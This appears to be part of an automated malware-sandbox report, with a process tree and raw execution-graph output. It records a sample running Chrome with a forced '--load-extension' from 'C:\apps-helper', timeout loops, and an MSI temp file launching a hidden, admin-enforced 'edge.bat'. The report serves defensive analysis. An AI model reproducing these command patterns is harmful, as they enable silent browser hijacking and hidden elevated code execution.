MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:14:11:58
Start date:28/10/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:14:11:58
Start date:28/10/2024
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:timeout 2
Imagebase:0x7ff798f70000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:14:11:58
Start date:28/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff6eef20000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:28
Start time:14:11:58
Start date:28/10/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,10222868034098351333,13685129222229150854,262144 /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:14:12:00
Start date:28/10/2024
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:timeout 2
Imagebase:0x7ff798f70000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:14:12:02
Start date:28/10/2024
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:timeout 2
Imagebase:0x7ff798f70000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:14:12:04
Start date:28/10/2024
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:timeout 2
Imagebase:0x7ff798f70000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:14:12:06
Start date:28/10/2024
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:timeout 2
Imagebase:0x7ff798f70000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                            Target ID:33
                                                                                                                                                                            Start time:14:12:08
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:34
                                                                                                                                                                            Start time:14:12:10
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:35
                                                                                                                                                                            Start time:14:12:11
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:36
                                                                                                                                                                            Start time:14:12:11
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2012,i,17522224552689378138,6417613085102451852,262144 /prefetch:8
                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:37
                                                                                                                                                                            Start time:14:12:12
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:38
                                                                                                                                                                            Start time:14:12:14
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:39
                                                                                                                                                                            Start time:14:12:16
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:40
                                                                                                                                                                            Start time:14:12:18
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:41
                                                                                                                                                                            Start time:14:12:19
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:42
                                                                                                                                                                            Start time:14:12:19
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1992,i,14024855596687576691,10802708795507051728,262144 /prefetch:8
                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:43
                                                                                                                                                                            Start time:14:12:20
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:44
                                                                                                                                                                            Start time:14:12:22
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:45
                                                                                                                                                                            Start time:14:12:24
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:46
                                                                                                                                                                            Start time:14:12:26
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:47
                                                                                                                                                                            Start time:14:12:28
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:48
                                                                                                                                                                            Start time:14:12:30
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:49
                                                                                                                                                                            Start time:14:12:32
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:50
                                                                                                                                                                            Start time:14:12:34
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:51
                                                                                                                                                                            Start time:14:12:36
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:52
                                                                                                                                                                            Start time:14:12:38
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 5
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:54
                                                                                                                                                                            Start time:14:12:43
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\Installer\MSIFB77.tmp
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Windows\Installer\MSIFB77.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\edge.bat"
                                                                                                                                                                            Imagebase:0x7ff7a4750000
                                                                                                                                                                            File size:570'176 bytes
                                                                                                                                                                            MD5 hash:514314174B6F6A3AB2195C456B83AA1E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:55
                                                                                                                                                                            Start time:14:12:43
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\edge.bat" "
                                                                                                                                                                            Imagebase:0x7ff65c650000
                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:56
                                                                                                                                                                            Start time:14:12:43
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false


                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:1.8%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:29.5%
                                                                                                                                                                              Total number of Nodes:1195
                                                                                                                                                                              Total number of Limit Nodes:45
FindClose 44921->44923 44922->44912 44923->44922 44925 baa9bd 44924->44925 44926 d81aea Concurrency::cancel_current_task RaiseException 44925->44926 44927 baa9ca RtlAllocateHeap 44926->44927 44927->44917 44928 ccad60 44972 cc9320 41 API calls 44928->44972 44930 ccad9f 44973 bd2880 41 API calls 44930->44973 44932 ccadb7 44974 ba9dd0 41 API calls 44932->44974 44934 ccadcd 44975 ba8960 40 API calls 2 library calls 44934->44975 44936 ccaddf 44937 ccae19 std::ios_base::_Ios_base_dtor __set_se_translator 44936->44937 44940 ccb048 44936->44940 44938 ccaea2 44937->44938 45008 bb9ad0 51 API calls 44937->45008 44939 ccaec9 44938->44939 44942 ccaeaf 44938->44942 44976 cd3dc0 44939->44976 45016 d851ef 44940->45016 45010 cd5630 93 API calls 5 library calls 44942->45010 44944 ccaeda 45011 ba8300 41 API calls 2 library calls 44944->45011 44946 ccb04d 44950 d851ef std::_Throw_Cpp_error 40 API calls 44946->44950 44948 ccae73 45009 ba81d0 41 API calls std::locale::_Locimp::_Locimp 44948->45009 44952 ccb052 44950->44952 44951 ccaec6 44951->44939 45021 ba8300 41 API calls 2 library calls 44952->45021 44953 ccaf11 45012 cc9320 41 API calls 44953->45012 44956 ccb0b9 45022 d819c5 44956->45022 44957 ccaf25 45013 cd1c40 59 API calls 5 library calls 44957->45013 44961 ccb0cc 45035 cd5630 93 API calls 5 library calls 44961->45035 44963 ccafdf std::ios_base::_Ios_base_dtor 45014 ba8960 40 API calls 2 library calls 44963->45014 44964 ccb0db 44965 ccaf45 std::ios_base::_Ios_base_dtor 44965->44946 44965->44963 44967 ccb015 45015 ba8960 40 API calls 2 library calls 44967->45015 44969 ccb027 44970 d7fd55 _ValidateLocalCookies 5 API calls 44969->44970 44971 ccb042 44970->44971 44972->44930 44973->44932 44974->44934 44975->44936 45036 ba8850 44976->45036 44978 cd3e69 __set_se_translator 44979 cd3e9a LoadStringW 44978->44979 44980 cd3ecd 44979->44980 44981 cd3f80 __set_se_translator 44979->44981 45051 ba8300 41 API calls 2 library calls 44980->45051 44983 cd3fd5 LoadStringW 44981->44983 45053 cd41c0 
42 API calls 2 library calls 44981->45053 44983->44981 44984 cd3fec 44983->44984 45054 ba8300 41 API calls 2 library calls 44984->45054 44985 cd3eee 44997 cd3f00 std::ios_base::_Ios_base_dtor 44985->44997 45052 ba8960 40 API calls 2 library calls 44985->45052 44989 cd400d 44989->44997 45055 ba8960 40 API calls 2 library calls 44989->45055 44990 cd4108 44994 d851ef std::_Throw_Cpp_error 40 API calls 44990->44994 44992 cd40c9 std::ios_base::_Ios_base_dtor 44993 d7fd55 _ValidateLocalCookies 5 API calls 44992->44993 44995 cd4101 44993->44995 44996 cd410d 44994->44996 44995->44944 44998 cd41ae 44996->44998 45000 cd4149 44996->45000 45001 cd4191 SysAllocStringLen 44996->45001 44997->44990 44997->44992 44999 baa9b0 2 API calls 44998->44999 45004 cd41b8 44999->45004 45002 cd414e CLSIDFromString SysFreeString 45000->45002 45001->45002 45003 cd41a4 45001->45003 45006 d7fd55 _ValidateLocalCookies 5 API calls 45002->45006 45005 baa9b0 2 API calls 45003->45005 45005->44998 45007 cd418d 45006->45007 45007->44944 45008->44948 45009->44938 45010->44951 45011->44953 45012->44957 45013->44965 45014->44967 45015->44969 45057 d8512b 40 API calls __cftof 45016->45057 45018 d851fe 45058 d8520c 11 API calls __set_se_translator 45018->45058 45020 d8520b 45021->44956 45059 d819d3 45022->45059 45024 d819ca 45024->44961 45073 d9947f EnterCriticalSection __set_se_translator 45024->45073 45026 d89880 45032 d8988b 45026->45032 45074 d994c4 40 API calls 6 library calls 45026->45074 45028 d89895 IsProcessorFeaturePresent 45030 d898a1 45028->45030 45029 d898b4 45076 d8b61b 22 API calls __set_se_translator 45029->45076 45075 d84fe3 8 API calls 2 library calls 45030->45075 45032->45028 45032->45029 45034 d898be 45035->44964 45037 ba889b 45036->45037 45038 ba885b 45036->45038 45056 ba8830 41 API calls 3 library calls 45037->45056 45039 ba8864 45038->45039 45042 ba8886 45038->45042 45039->45037 45041 ba886b 45039->45041 45045 d7fd94 std::_Facet_Register 2 API calls 45041->45045 45043 ba8896 
45042->45043 45046 d7fd94 std::_Facet_Register 2 API calls 45042->45046 45043->44978 45044 ba8871 45047 d851ef std::_Throw_Cpp_error 40 API calls 45044->45047 45050 ba887a 45044->45050 45045->45044 45048 ba8890 45046->45048 45049 ba88a5 45047->45049 45048->44978 45050->44978 45051->44985 45052->44997 45053->44981 45054->44989 45055->44997 45056->45044 45057->45018 45058->45020 45060 d819dc 45059->45060 45061 d819df GetLastError 45059->45061 45060->45024 45077 d84bbd 6 API calls ___vcrt_InitializeCriticalSectionEx 45061->45077 45063 d819f4 45064 d81a13 45063->45064 45065 d81a59 SetLastError 45063->45065 45078 d84bf8 6 API calls ___vcrt_InitializeCriticalSectionEx 45063->45078 45064->45065 45065->45024 45067 d81a0d __Getctype 45067->45064 45068 d81a35 45067->45068 45079 d84bf8 6 API calls ___vcrt_InitializeCriticalSectionEx 45067->45079 45071 d81a49 45068->45071 45080 d84bf8 6 API calls ___vcrt_InitializeCriticalSectionEx 45068->45080 45081 d89c89 45071->45081 45073->45026 45074->45032 45075->45029 45076->45034 45077->45063 45078->45067 45079->45068 45080->45071 45084 d9817e 45081->45084 45085 d98189 RtlFreeHeap 45084->45085 45086 d89ca1 45084->45086 45085->45086 45087 d9819e GetLastError 45085->45087 45086->45064 45088 d981ab __dosmaperr 45087->45088 45090 d852ff 13 API calls __dosmaperr 45088->45090 45090->45086 45091 bdcbb0 45092 bdcbfa 45091->45092 45093 bdd733 45091->45093 45092->45093 45095 bdcc03 45092->45095 45094 baa9b0 2 API calls 45093->45094 45096 bdd73d 45094->45096 45097 bdcc8d 45095->45097 45283 baacf0 45095->45283 45098 d851ef std::_Throw_Cpp_error 40 API calls 45096->45098 45257 d7db49 44 API calls 6 library calls 45097->45257 45101 bdd742 45098->45101 45429 d7d8f7 41 API calls 2 library calls 45101->45429 45103 bdccd2 45258 bdf130 44 API calls 6 library calls 45103->45258 45105 bdd76d 45109 baa9b0 2 API calls 45105->45109 45107 bdd749 45430 d7d8f7 41 API calls 2 library calls 45107->45430 45108 bdcce5 45259 bdf330 44 API calls 4 library calls 
45108->45259 45110 bdd777 45109->45110 45113 baa9b0 2 API calls 45110->45113 45118 bdd781 45113->45118 45114 bdd750 45431 d7d8f7 41 API calls 2 library calls 45114->45431 45116 bdccf1 45260 bdef70 41 API calls std::_Facet_Register 45116->45260 45122 baa9b0 2 API calls 45118->45122 45120 bdcc7c 45381 d00070 45120->45381 45121 bdcd10 45261 bdf7c0 41 API calls 2 library calls 45121->45261 45124 bdd78b __set_se_translator 45122->45124 45123 bdd757 45432 d899d2 46 API calls 2 library calls 45123->45432 45434 cbd230 52 API calls 2 library calls 45124->45434 45127 bdcc54 45127->45120 45129 bc2290 120 API calls 45127->45129 45128 bdd75c 45433 d7d8f7 41 API calls 2 library calls 45128->45433 45129->45120 45133 bdd858 45435 ba8300 41 API calls 2 library calls 45133->45435 45135 bdcd47 45262 ccbee0 105 API calls 45135->45262 45138 bdd899 45140 d7fd94 std::_Facet_Register 2 API calls 45138->45140 45139 bdcdfa 45263 ba8300 41 API calls 2 library calls 45139->45263 45141 bdd8e9 45140->45141 45436 d89b6a 45 API calls 2 library calls 45141->45436 45144 bdce39 45264 cbd440 51 API calls _ValidateLocalCookies 45144->45264 45145 bdd91e 45147 bdd92f 45145->45147 45148 bdda63 45145->45148 45150 bdd95e GetCurrentThreadId 45147->45150 45151 bdda74 45147->45151 45441 d7d8f7 41 API calls 2 library calls 45148->45441 45149 bdce49 45265 ba8960 40 API calls 2 library calls 45149->45265 45154 bdda7b 45150->45154 45155 bdd971 45150->45155 45442 d7d8f7 41 API calls 2 library calls 45151->45442 45443 d7d8f7 41 API calls 2 library calls 45154->45443 45437 d7d95b WaitForSingleObjectEx GetExitCodeThread CloseHandle 45155->45437 45157 bdce55 45266 ba8300 41 API calls 2 library calls 45157->45266 45161 bdd97f 45162 bdda82 45161->45162 45163 bdd98a 45161->45163 45444 d7d8f7 41 API calls 2 library calls 45162->45444 45165 bdda89 45163->45165 45166 bdd9ab 45163->45166 45445 d899d2 46 API calls 2 library calls 45165->45445 45168 bdd9ed std::ios_base::_Ios_base_dtor 45166->45168 45171 bdda8e 45166->45171 
45438 ba8960 40 API calls 2 library calls 45168->45438 45174 d851ef std::_Throw_Cpp_error 40 API calls 45171->45174 45172 bdcf8e lstrcmpiW 45175 bdce8f 45172->45175 45173 bdda1a 45439 ba8960 40 API calls 2 library calls 45173->45439 45178 bdda93 45174->45178 45179 bdd18b 45175->45179 45412 ba8300 41 API calls 2 library calls 45175->45412 45176 bdce79 45176->45172 45176->45175 45446 ba8960 40 API calls 2 library calls 45178->45446 45197 bdd1c2 std::ios_base::_Ios_base_dtor 45179->45197 45415 ba8960 40 API calls 2 library calls 45179->45415 45180 bdda29 45440 ba8960 40 API calls 2 library calls 45180->45440 45184 bddad5 45185 bdd16a 45414 cbc540 lstrcmpiW 45185->45414 45186 bdd11e lstrcmpiW 45190 bdcff5 45186->45190 45187 bdcfd8 45187->45186 45187->45190 45189 bdda48 45192 d7fd55 _ValidateLocalCookies 5 API calls 45189->45192 45190->45179 45413 ba8300 41 API calls 2 library calls 45190->45413 45196 bdda5f 45192->45196 45193 bdd274 std::ios_base::_Ios_base_dtor 45194 bdd29f 45193->45194 45195 bdd391 45193->45195 45199 d7fd94 std::_Facet_Register 2 API calls 45194->45199 45267 cc72e0 45195->45267 45197->45096 45197->45193 45201 bdd2ad 45199->45201 45416 d89b6a 45 API calls 2 library calls 45201->45416 45202 bdd45f 45205 baacf0 52 API calls 45202->45205 45203 bdd39e 45418 ba8300 41 API calls 2 library calls 45203->45418 45207 bdd464 45205->45207 45206 bdd2ec 45206->45101 45206->45128 45210 bdd321 GetCurrentThreadId 45206->45210 45207->45105 45208 bdd46e 45207->45208 45214 bdd49f 45208->45214 45215 bdd494 45208->45215 45210->45107 45212 bdd334 45210->45212 45211 bdd3d9 45419 ba8300 41 API calls 2 library calls 45211->45419 45417 d7d95b WaitForSingleObjectEx GetExitCodeThread CloseHandle 45212->45417 45423 baa830 42 API calls 4 library calls 45214->45423 45422 baa2a0 49 API calls 45215->45422 45216 bdd342 45216->45114 45217 bdd34d 45216->45217 45217->45123 45224 bdd378 45217->45224 45221 bdd49d 45424 ccd460 114 API calls 45221->45424 45222 bdd41e 45420 ba8960 40 API calls 
